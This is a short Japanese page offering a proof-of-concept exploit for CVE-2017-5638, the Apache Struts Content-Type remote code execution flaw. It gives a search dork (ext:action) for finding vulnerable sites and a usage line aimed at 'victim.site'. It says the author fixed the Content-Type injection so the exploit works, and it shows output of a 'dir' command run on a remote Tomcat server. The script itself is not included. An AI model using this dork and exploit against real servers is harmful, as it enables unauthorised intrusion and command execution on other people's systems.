
CVE-2017-5638用PoCコードの例 | Apache Strutsエクスプロイト
CVE-2017-5638 の PoC コード例 | Apache Struts エクスプロイト | DORK: ext:action
使用法: python struts.py https://victim.site dir
公開された最初の Python スクリプトは、Content-Type ヘッダーを正しくフォーマットしていませんでした。Content-Type:%20{Exploit} を正しくフォーマットするように、Content-Type ヘッダーを書き直しました。また、ロギングと Requests を追加し、オブジェクトのプロパティを stdout にダンプしました。
サンプル出力
XSS.Cx による CVE-2017-5638 のチェック
ドライブ D のボリュームにはラベルがありません。 ボリューム シリアル番号は 2A7B-A245 です。 d:\Program Files\Apache Software Foundation\Tomcat 9.0 のディレクトリ